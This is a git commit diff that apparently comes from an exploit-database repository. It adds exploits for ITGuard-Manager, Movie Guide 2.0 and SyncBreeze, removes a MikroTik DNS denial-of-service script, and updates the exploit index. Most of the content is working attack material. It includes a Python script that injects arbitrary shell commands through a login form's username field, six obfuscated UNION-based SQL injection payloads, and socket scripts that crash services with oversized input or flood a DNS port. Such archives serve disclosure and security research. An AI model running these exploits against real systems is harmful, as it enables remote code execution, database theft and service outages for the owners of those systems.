DB: 2017-12-16

5 changes to exploits/shellcodes MikroTik RouterBoard 6.39.2 / 6.40.5 DNS - Denial of Service Sync Breeze 10.2.12 - Denial of Service ITGuard-Manager 0.0.0.1 - Remote Code Execution Movie Guide 2.0 - SQL Injection
2017-12-16 05:02:18 +00:00 · 2017-12-16 05:02:18 +00:00 · cfef56c321
commit cfef56c321
parent ed1c4edf3e
5 changed files with 191 additions and 42 deletions
--- a/exploits/cgi/webapps/43343.py
+++ b/exploits/cgi/webapps/43343.py
@ -0,0 +1,49 @@
+# Vulnerability Title:  ITGuard-Manager V0.0.0.1 PreAuth Remote Code Execution 
+# Author: Nassim Asrir 
+# Contact: wassline@gmail.com / @asrir_nassim
+# CVE: Waiting ...
+# CVSS: CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:H/E:H/MAV:P3.0/AV:P/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:H/E:H/MAV:P  
+# Vendor:  http://www.innotube.com
+
+
+Details:
+========
+
+First we need to know what happens when we need to LogIn.
+When the User or Attacker insert any strings in the login form he/she will get this POST request: 
+
+POST /cgi-bin/drknow.cgi?req=login HTTP/1.1 
+Host: server
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Referer: http://server/log-in.html?lang=KOR
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 45
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+req=login&lang=KOR&username=admin&password=admin
+
+ 
+Ok now we have this POST request and all we care about is the ‘username’ parameter . and we
+can execute our system commands via this parameter due to missing input sanitization.
+The payload will be: 'admin|'command'||x we will change the command by any *unix command (ls – id – mkdir ….) 
+
+Exploit:
+=======
+
+#i am not responsible for any wrong use.
+
+import requests
+target = raw_input('Target(With proto) : ')
+command = raw_input('Command To Execute : ')
+fullpath=target +"/cgi-bin/drknow.cgi?req=login"
+data = {'req':'login',
+        'lang':'ENG',
+        'username':'admin|'+command+'||x',
+        'password':'admin'}
+ 
+execute = requests.post(fullpath, data = data)
+ 
+print execute.text
--- a/exploits/hardware/dos/43200.py
+++ b/exploits/hardware/dos/43200.py
@ -1,41 +0,0 @@
-import socket
-import os
-import time
-from threading import Thread
-import sys
-
-
-def rep1():
-	os.system('echo -ne "\x4d\x69\x6b\x72\x6f\x54\x69\x6b\x20\x44\x65\x6e\x69\x61\x6c\x20\x6f\x66\x20\x53\x65\x72\x76\x69\x63\x65\x20\x6f\x6e\x20\x44\x4e\x53\x20\x73\x65\x72\x76\x69\x63\x65\x2e\x20\x48\x6f\x73\x65\x69\x6e\x20\x41\x73\x6b\x61\x72\x69" | dd conv=notrunc bs=1000 seek=500 of=/home/constantine/test/poc')
-	os.system('cat poc | nc -v 192.168.1.1 53') 
-	
-def rep2():
-        os.system('cat poc | nc -v 192.168.1.1 53') 
-        
-def rep3():
-        os.system('cat poc | nc -v 192.168.1.1 53') 
-        
-def rep4():
-        os.system('cat poc | nc -v 192.168.1.1 53') 
-        
-def rep5():
-        os.system('cat poc | nc -v 192.168.1.1 53') 
-        
-	
-		
-if __name__ == "__main__":
-    threads = []
-    try:
-        for a in [rep1, rep2, rep3, rep4, rep5]:
-            t = Thread(target=a)
-            t.start()
-            threads.append(t)
-            time.sleep(4)
-	time.sleep(4)
-	print("For Stopping the attack, Hit CTRL+C now")
-      	    
-
-    except KeyboardInterrupt:
-        sys.exit(0)
-    finally:
-        [t.join() for t in threads]
--- a/exploits/php/webapps/43346.txt
+++ b/exploits/php/webapps/43346.txt
@ -0,0 +1,51 @@
+# # # # #
+# Exploit Title: Movie Guide 2.0 - SQL Injection
+# Dork: N/A
+# Date: 15.12.2017
+# Vendor Homepage: http://applebitemedia.com/
+# Software Link: http://applebitemedia.com/amwdl/AM_Movie_Guide.tar.gz
+# Version: 2.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# 1)
+# http://localhost/[PATH]/index.php?md=[SQL]
+#  
+# %2dV'%20%20%2f*!02222UNION*%2f(%2f*!02222SELECT*%2f%200x253238253331253239%2c0x253238253332253239%2c(%2f*!02222Select*%2f%20export_set(5%2c@:=0%2c(%2f*!02222select*%2f%20count(*)%2f*!02222from*%2f(information_schema.columns%29where@:=export_set(5%2cexport_set(5%2c@%2c%2f*!02222table_name*%2f%2c0x3c6c693e%2c2)%2c%2f*!02222column_name*%2f%2c0xa3a%2c2))%2c@%2c2))%2c0x253238253334253239%2c0x253238253335253239%2c0x253238253336253239%2c0x253238253337253239%2c0x253238253338253239%2c0x253238253339253239%2c0x253238253331253330253239%2c0x253238253331253331253239%2c0x253238253331253332253239)%2d%2d%20%2d
+#  
+# 2)
+# http://localhost/[PATH]/index.php?pid=minfo&Movie_Id=[SQL]
+#  
+# %2dV'%20%20%2f*!02222UNION*%2f(%2f*!02222SELECT*%2f%200x253238253331253239%2c0x253238253332253239%2c(%2f*!02222Select*%2f%20export_set(5%2c@:=0%2c(%2f*!02222select*%2f%20count(*)%2f*!02222from*%2f(information_schema.columns%29where@:=export_set(5%2cexport_set(5%2c@%2c%2f*!02222table_name*%2f%2c0x3c6c693e%2c2)%2c%2f*!02222column_name*%2f%2c0xa3a%2c2))%2c@%2c2))%2c0x253238253334253239%2c0x253238253335253239%2c0x253238253336253239%2c0x253238253337253239%2c0x253238253338253239%2c0x253238253339253239%2c0x253238253331253330253239%2c0x253238253331253331253239%2c0x253238253331253332253239)%2d%2d%20%2d
+#  
+# 3)
+# http://localhost/[PATH]/index.php?director=[SQL]
+#  
+# a'%20%20%2f*!02222UNION*%2f(%2f*!02222SELECT*%2f%200x253238253331253239%2c0x253238253332253239%2c(%2f*!02222Select*%2f%20export_set(5%2c@:=0%2c(%2f*!02222select*%2f%20count(*)%2f*!02222from*%2f(information_schema.columns%29where@:=export_set(5%2cexport_set(5%2c@%2c%2f*!02222table_name*%2f%2c0x3c6c693e%2c2)%2c%2f*!02222column_name*%2f%2c0xa3a%2c2))%2c@%2c2))%2c0x253238253334253239%2c0x253238253335253239%2c0x253238253336253239%2c0x253238253337253239%2c0x253238253338253239%2c0x253238253339253239%2c0x253238253331253330253239%2c0x253238253331253331253239%2c0x253238253331253332253239)%2d%2d%20%2d
+# 
+# 4)
+# http://localhost/[PATH]/index.php?actor=[SQL]
+#  
+# -a'%20%20%2f*!02222UNION*%2f(%2f*!02222SELECT*%2f%200x253238253331253239%2c0x253238253332253239%2c(%2f*!02222Select*%2f%20export_set(5%2c@:=0%2c(%2f*!02222select*%2f%20count(*)%2f*!02222from*%2f(information_schema.columns%29where@:=export_set(5%2cexport_set(5%2c@%2c%2f*!02222table_name*%2f%2c0x3c6c693e%2c2)%2c%2f*!02222column_name*%2f%2c0xa3a%2c2))%2c@%2c2))%2c0x253238253334253239%2c0x253238253335253239%2c0x253238253336253239%2c0x253238253337253239%2c0x253238253338253239%2c0x253238253339253239%2c0x253238253331253330253239%2c0x253238253331253331253239%2c0x253238253331253332253239)%2d%2d%20%2d
+#  
+# 5)
+# http://localhost/[PATH]/index.php?gterm=[SQL]
+#  
+# -a'%20%20%2f*!02222UNION*%2f(%2f*!02222SELECT*%2f%200x253238253331253239%2c0x253238253332253239%2c(%2f*!02222Select*%2f%20export_set(5%2c@:=0%2c(%2f*!02222select*%2f%20count(*)%2f*!02222from*%2f(information_schema.columns%29where@:=export_set(5%2cexport_set(5%2c@%2c%2f*!02222table_name*%2f%2c0x3c6c693e%2c2)%2c%2f*!02222column_name*%2f%2c0xa3a%2c2))%2c@%2c2))%2c0x253238253334253239%2c0x253238253335253239%2c0x253238253336253239%2c0x253238253337253239%2c0x253238253338253239%2c0x253238253339253239%2c0x253238253331253330253239%2c0x253238253331253331253239%2c0x253238253331253332253239)%2d%2d%20%2d
+# 
+# 6)
+# http://localhost/[PATH]/index.php?year=[SQL]
+#  
+# -a'%20%20%2f*!02222UNION*%2f(%2f*!02222SELECT*%2f%200x253238253331253239%2c0x253238253332253239%2c(%2f*!02222Select*%2f%20export_set(5%2c@:=0%2c(%2f*!02222select*%2f%20count(*)%2f*!02222from*%2f(information_schema.columns%29where@:=export_set(5%2cexport_set(5%2c@%2c%2f*!02222table_name*%2f%2c0x3c6c693e%2c2)%2c%2f*!02222column_name*%2f%2c0xa3a%2c2))%2c@%2c2))%2c0x253238253334253239%2c0x253238253335253239%2c0x253238253336253239%2c0x253238253337253239%2c0x253238253338253239%2c0x253238253339253239%2c0x253238253331253330253239%2c0x253238253331253331253239%2c0x253238253331253332253239)%2d%2d%20%2d
+# 
+# # # # #
--- a/exploits/windows/dos/43344.py
+++ b/exploits/windows/dos/43344.py
@ -0,0 +1,88 @@
+=============================================
+MGC ALERT 2017-007
+- Original release date: November 30, 2017
+- Last revised:  December 14, 2017
+- Discovered by: Manuel García Cárdenas
+- Severity: 7,5/10 (CVSS Base Score)
+- CVE-ID: CVE-2017-17088
+=============================================
+
+I. VULNERABILITY
+-------------------------
+SyncBreeze <= 10.2.12 - Denial of Service
+
+II. BACKGROUND
+-------------------------
+SyncBreeze is a fast, powerful and reliable file synchronization solution
+for local disks, network shares, NAS storage devices and enterprise storage
+systems.
+
+III. DESCRIPTION
+-------------------------
+The Enterprise version of SyncBreeze is affected by a Remote Denial of
+Service vulnerability.
+
+The web server does not check bounds when reading server request in the
+Host header on making a connection, resulting in a classic Buffer Overflow
+that causes a Denial of Service.
+
+To exploit the vulnerability only is needed use the version 1.1 of the HTTP
+protocol to interact with the application.
+
+IV. PROOF OF CONCEPT
+-------------------------
+#!/usr/bin/python
+import sys, socket
+
+host = sys.argv[1]
+buffer="GET / HTTP/1.1\r\n"
+buffer+="Host: "+"A"*2000+"\r\n\r\n"
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect((host, 80))
+s.send(buffer)
+s.close()
+
+V. BUSINESS IMPACT
+-------------------------
+Availability compromise can result from these attacks.
+
+VI. SYSTEMS AFFECTED
+-------------------------
+SyncBreeze <= 10.2.12
+
+VII. SOLUTION
+-------------------------
+Vendor release 10.3 version
+http://www.syncbreeze.com/setups/syncbreezeent_setup_v10.3.14.exe
+
+VIII. REFERENCES
+-------------------------
+http://www.syncbreeze.com/
+
+IX. CREDITS
+-------------------------
+This vulnerability has been discovered and reported
+by Manuel García Cárdenas (advidsec (at) gmail (dot) com).
+
+X. REVISION HISTORY
+-------------------------
+November 30, 2017 1: Initial release
+December 14, 2017 2: Revision to send to lists
+
+XI. DISCLOSURE TIMELINE
+-------------------------
+November 30, 2017 1: Vulnerability acquired by Manuel Garcia Cardenas
+November 30, 2017 2: Send to vendor
+December 6,  2017 3: Vendor fix the vulnerability and release a new version
+December 14, 2017 4: Send to the Full-Disclosure lists
+
+XII. LEGAL NOTICES
+-------------------------
+The information contained within this advisory is supplied "as-is" with no
+warranties or guarantees of fitness of use or otherwise.
+
+XIII. ABOUT
+-------------------------
+Manuel Garcia Cardenas
+Pentester
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -5763,7 +5763,6 @@ id,file,description,date,author,type,platform,port
 43189,exploits/android/dos/43189.py,"Android Gmail < 7.11.5.176568039 - Directory Traversal in Attachment Download",2017-11-28,"Google Security Research",dos,android,
 43194,exploits/linux/dos/43194.txt,"QEMU - NBD Server Long Export Name Stack Buffer Overflow",2017-11-29,"Eric Blake",dos,linux,
 43199,exploits/linux/dos/43199.c,"Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page",2017-11-30,Bindecy,dos,linux,
-43200,exploits/hardware/dos/43200.py,"MikroTik RouterBoard 6.39.2 / 6.40.5 DNS - Denial of Service",2017-11-30,FarazPajohan,dos,hardware,
 43207,exploits/windows/dos/43207.txt,"Abyss Web Server < 2.11.6 - Heap Memory Corruption",2017-12-01,hyp3rlinx,dos,windows,
 43229,exploits/windows/dos/43229.cs,"Microsoft Windows Defender - Controlled Folder Bypass Through UNC Path",2017-12-07,"Google Security Research",dos,windows,
 43233,exploits/multiple/dos/43233.txt,"Wireshark 2.4.0 < 2.4.2 / 2.2.0 < 2.2.10 - CIP Safety Dissector Crash",2017-12-07,Wireshark,dos,multiple,
@ -5778,6 +5777,7 @@ id,file,description,date,author,type,platform,port
 43326,exploits/multiple/dos/43326.c,"macOS/iOS - Multiple Kernel Use-After-Frees due to Incorrect IOKit Object Lifetime Management in IOTimeSyncClockManagerUserClient",2017-12-12,"Google Security Research",dos,multiple,
 43327,exploits/macos/dos/43327.c,"macOS - Kernel Code Execution due to Lack of Bounds Checking in AppleIntelCapriController::GetLinkConfig",2017-12-12,"Google Security Research",dos,macos,
 43328,exploits/multiple/dos/43328.c,"macOS/iOS - Kernel Double Free due to Incorrect API Usage in Flow Divert Socket Option Handling",2017-12-12,"Google Security Research",dos,multiple,
+43344,exploits/windows/dos/43344.py,"Sync Breeze 10.2.12 - Denial of Service",2017-12-15,"Manuel García Cárdenas",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -38374,3 +38374,5 @@ id,file,description,date,author,type,platform,port
 43336,exploits/php/webapps/43336.html,"Bus Booking Script 1.0 - 'txtname' SQL Injection",2017-12-14,"Ihsan Sencan",webapps,php,
 43337,exploits/php/webapps/43337.txt,"Piwigo 2.9.1 - 'cat_true' / 'cat_false' SQL Injection",2017-12-14,Akityo,webapps,php,
 43340,exploits/windows/webapps/43340.rb,"Advantech WebAccess 8.2-2017.03.31 - Webvrpcs Service Opcode 80061 Stack Buffer Overflow (Metasploit)",2017-12-14,Metasploit,webapps,windows,4592
+43343,exploits/cgi/webapps/43343.py,"ITGuard-Manager 0.0.0.1 - Remote Code Execution",2017-12-15,"Nassim Asrir",webapps,cgi,
+43346,exploits/php/webapps/43346.txt,"Movie Guide 2.0 - SQL Injection",2017-12-15,"Ihsan Sencan",webapps,php,80